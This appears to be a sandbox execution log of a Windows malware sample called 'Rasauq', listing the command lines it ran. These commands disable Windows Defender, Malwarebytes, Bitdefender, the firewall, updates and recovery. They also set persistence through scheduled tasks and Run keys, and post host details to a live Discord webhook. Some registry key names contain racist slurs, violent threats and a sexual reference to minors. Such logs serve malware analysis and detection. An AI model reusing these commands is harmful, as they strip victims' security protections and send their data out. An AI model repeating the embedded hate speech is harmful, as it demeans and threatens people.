reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoSettings" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoAddPrinter" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAVerb" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideIcons" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "InvertMouse" /t REG_DWORD /d 1 /f

C:\Windows\system32\ReAgentc.exe

reagentc /disable

C:\Windows\system32\ReAgentc.exe

reagentc /disable

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Rasauq SoftWorks.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(Invoke-WebRequest -Uri 'https://api64.ipify.org').Content"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Recovery\WinRE.wim /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Recovery\WinRE.wim /grant Administrators:F /t /c /l /q

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Recovery /a /r /d y

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Recovery /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Recovery /grant Administrators:F /t /c /l /q

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(Invoke-WebRequest -Uri 'https://api64.ipify.org').Content"

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue {default} recoveryenabled

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\net.exe

net stop "SDRSVC"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC"

C:\Windows\system32\net.exe

net stop "WinDefend"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WinDefend"

C:\Windows\system32\taskkill.exe

taskkill /f /t /im "MSASCui.exe"

C:\Windows\system32\net.exe

net stop "security center"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Service.scr'

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "security center"

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode-disable

C:\Windows\system32\bcdedit.exe

bcdedit /set {current} recoveryenabled No

C:\Windows\system32\bcdedit.exe

bcdedit /deletevalue {default} recoveryenabled

C:\Windows\System32\attrib.exe

"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host"

C:\Windows\System32\attrib.exe

"C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe"

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WinRE" /v "DisableWinRE" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\net.exe

net stop "wuauserv"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wuauserv"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"

C:\Windows\system32\net.exe

net stop "SDRSVC"

C:\Windows\system32\net.exe

net stop "Windows Defender Service"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "Windows Defender Service"

C:\Windows\system32\net.exe

net stop "WinDefend"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WinDefend"

C:\Windows\system32\net.exe

net stop "Windows Firewall"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "Windows Firewall"

C:\Windows\system32\taskkill.exe

taskkill /f /t /im "MSASCui.exe"

C:\Windows\system32\net.exe

net stop sharedaccess

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sharedaccess

C:\Windows\system32\net.exe

net stop "security center"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Service.scr'

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "security center"

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode-disable

C:\Windows\system32\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start= disabled

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableAntiTamper $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1331583807400448021/BIO3EGZqzJuWIDqMV140NxXK8QfJCkExNWsvW6c97iT6FqM5899Ksa79jqtc5HIXTCOr' -Method Post -ContentType 'application/json' -Body (''{ ^\"content\": ^\"**Rasauq Client Alert**\", ^\"embeds\": [^ { ^\"title\": ^\"Rasauq Force RD\", ^\"color\": 16711680, ^\"fields\": [^ { ^\"name\": ^\"PC Name\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"User\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Local IP\", ^\"value\": ^\"\", ^\"inline\": true }, ^ { ^\"name\": ^\"Public IP\", ^\"value\": ^\"\", ^\"inline\": true } ] } ] }''"

C:\Windows\system32\net.exe

net stop "wuauserv"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wuauserv"

C:\Windows\system32\net.exe

net stop "Windows Defender Service"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "Windows Defender Service"

C:\Windows\system32\net.exe

net stop "Windows Firewall"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "Windows Firewall"

C:\Windows\system32\net.exe

net stop sharedaccess

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop sharedaccess

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\system32\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

REG DELETE "HKCU\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\system32\sc.exe

sc config WinDefend start= disabled

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableAntiTamper $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Service" /tr "C:\Users\Admin\AppData\Local\Windows Host Service.scr"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableBehaviorMonitoring $true"

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbam.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM MBAMService.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbamscheduler.exe /T

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\system32\sc.exe

sc stop MBAMService

C:\Windows\system32\sc.exe

sc delete MBAMService

C:\Windows\system32\sc.exe

sc stop MBAMProtector

C:\Windows\system32\sc.exe

sc delete MBAMProtector

C:\Windows\system32\sc.exe

sc stop MBAMChameleon

C:\Windows\system32\sc.exe

sc delete MBAMChameleon

C:\Windows\system32\sc.exe

sc stop MBAMFarflt

C:\Windows\system32\sc.exe

sc delete MBAMFarflt

C:\Windows\system32\sc.exe

sc stop MBAMSwissArmy

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\mspmsnsv.dll" /r /d y

C:\Windows\system32\sc.exe

sc delete MBAMSwissArmy

C:\Windows\system32\takeown.exe

takeown /f "C:\Windows\System32\wscsvc.dll" /r /d y

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbam.exe /T

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM MBAMService.exe /T

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdservicehost.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdagent.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdredline.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM mbamscheduler.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdparentalservice.exe /T

C:\Windows\system32\sc.exe

sc stop MBAMService

C:\Windows\system32\sc.exe

sc delete MBAMService

C:\Windows\system32\sc.exe

sc stop MBAMProtector

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdreinit.exe /T

C:\Windows\system32\sc.exe

sc delete MBAMProtector

C:\Windows\system32\sc.exe

sc stop MBAMChameleon

C:\Windows\system32\sc.exe

sc delete MBAMChameleon

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdsubwiz.exe /T

C:\Windows\system32\sc.exe

sc stop MBAMFarflt

C:\Windows\system32\sc.exe

sc delete MBAMFarflt

C:\Windows\system32\sc.exe

sc stop MBAMSwissArmy

C:\Windows\system32\taskkill.exe

taskkill /F /IM seccenter.exe /T

C:\Windows\system32\sc.exe

sc delete MBAMSwissArmy

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM vsserv.exe /T

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM epssecurityservice.exe /T

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdservicehost.exe /T

C:\Windows\system32\sc.exe

sc stop bdservicehost

C:\Windows\system32\sc.exe

sc delete bdservicehost

C:\Windows\system32\sc.exe

sc stop bdagent

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdagent.exe /T

C:\Windows\system32\sc.exe

sc delete bdagent

C:\Windows\system32\sc.exe

sc stop bdredline

C:\Windows\system32\sc.exe

sc delete bdredline

C:\Windows\system32\sc.exe

sc stop bdparentalservice

C:\Windows\system32\sc.exe

sc delete bdparentalservice

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdredline.exe /T

C:\Windows\system32\sc.exe

sc stop bdreinit

C:\Windows\system32\sc.exe

sc delete bdreinit

C:\Windows\system32\sc.exe

sc stop bdsubwiz

C:\Windows\system32\sc.exe

sc delete bdsubwiz

C:\Windows\system32\sc.exe

sc stop seccenter

C:\Windows\system32\sc.exe

sc delete seccenter

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdparentalservice.exe /T

C:\Windows\system32\sc.exe

sc stop vsserv

C:\Windows\system32\sc.exe

sc delete vsserv

C:\Windows\system32\sc.exe

sc stop epssecurityservice

C:\Windows\system32\sc.exe

sc delete epssecurityservice

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdreinit.exe /T

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM bdsubwiz.exe /T

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\taskkill.exe

taskkill /F /IM seccenter.exe /T

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc delete WinDefend

C:\Windows\system32\sc.exe

sc stop SecurityHealthService

C:\Windows\system32\sc.exe

sc delete SecurityHealthService

C:\Windows\system32\taskkill.exe

taskkill /F /IM vsserv.exe /T

C:\Windows\system32\sc.exe

sc stop Sense

C:\Windows\system32\sc.exe

sc delete Sense

C:\Windows\system32\taskkill.exe

taskkill /F /IM MsMpEng.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM epssecurityservice.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM MpCmdRun.exe /T

C:\Windows\system32\sc.exe

sc stop bdservicehost

C:\Windows\system32\sc.exe

sc delete bdservicehost

C:\Windows\system32\sc.exe

sc stop bdagent

C:\Windows\system32\taskkill.exe

taskkill /F /IM SecurityHealthSystray.exe /T

C:\Windows\system32\sc.exe

sc delete bdagent

C:\Windows\system32\sc.exe

sc stop bdredline

C:\Windows\system32\sc.exe

sc delete bdredline

C:\Windows\system32\taskkill.exe

taskkill /F /IM smartscreen.exe /T

C:\Windows\system32\sc.exe

sc stop bdparentalservice

C:\Windows\system32\sc.exe

sc delete bdparentalservice

C:\Windows\system32\sc.exe

sc stop bdreinit

C:\Windows\system32\takeown.exe

takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y

C:\Windows\system32\sc.exe

sc delete bdreinit

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q

C:\Windows\system32\sc.exe

sc stop bdsubwiz

C:\Windows\system32\sc.exe

sc delete bdsubwiz

C:\Windows\system32\sc.exe

sc stop seccenter

C:\Windows\system32\sc.exe

sc delete seccenter

C:\Windows\system32\sc.exe

sc stop vsserv

C:\Windows\system32\sc.exe

sc delete vsserv

C:\Windows\system32\sc.exe

sc stop epssecurityservice

C:\Windows\system32\sc.exe

sc delete epssecurityservice

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f

C:\Windows\system32\takeown.exe

takeown /f "C:\Program Files\Windows Defender" /r /d y

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\notepad.exe /a /r /d y

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc delete WinDefend

C:\Windows\system32\sc.exe

sc stop SecurityHealthService

C:\Windows\system32\sc.exe

sc delete SecurityHealthService

C:\Windows\system32\sc.exe

sc stop Sense

C:\Windows\system32\sc.exe

sc delete Sense

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\calc.exe /a /r /d y

C:\Windows\system32\taskkill.exe

taskkill /F /IM MsMpEng.exe /T

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\taskkill.exe

taskkill /F /IM MpCmdRun.exe /T

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\taskkill.exe

taskkill /F /IM SecurityHealthSystray.exe /T

C:\Windows\system32\taskkill.exe

taskkill /F /IM smartscreen.exe /T

C:\Windows\system32\powercfg.exe

powercfg /hibernate off REM Disables hibernation

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery

C:\Windows\system32\takeown.exe

takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y

C:\Windows\system32\powercfg.exe

powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in

C:\Windows\system32\powercfg.exe

powercfg /devicedisablewake "Device Name"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q

C:\Windows\system32\takeown.exe

takeown /f "C:\Program Files\Windows Defender" /r /d y

C:\Windows\system32\icacls.exe

icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q

C:\Windows\system32\powercfg.exe

powercfg /devicedisablewake "USB Root Hub"

C:\Windows\system32\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKCR\behead all niggers" /f

C:\Windows\system32\reg.exe

reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k

C:\Windows\system32\reg.exe

reg query "HKU" /s /f "Software" /k

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\notepad.exe /a /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\calc.exe /a /r /d y

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

reg add "HKEY_USERS\S-1-5-21-994669834-3080981395-1291080877-1000\Software\Software\Rasauq on top" /f

C:\Windows\system32\reg.exe

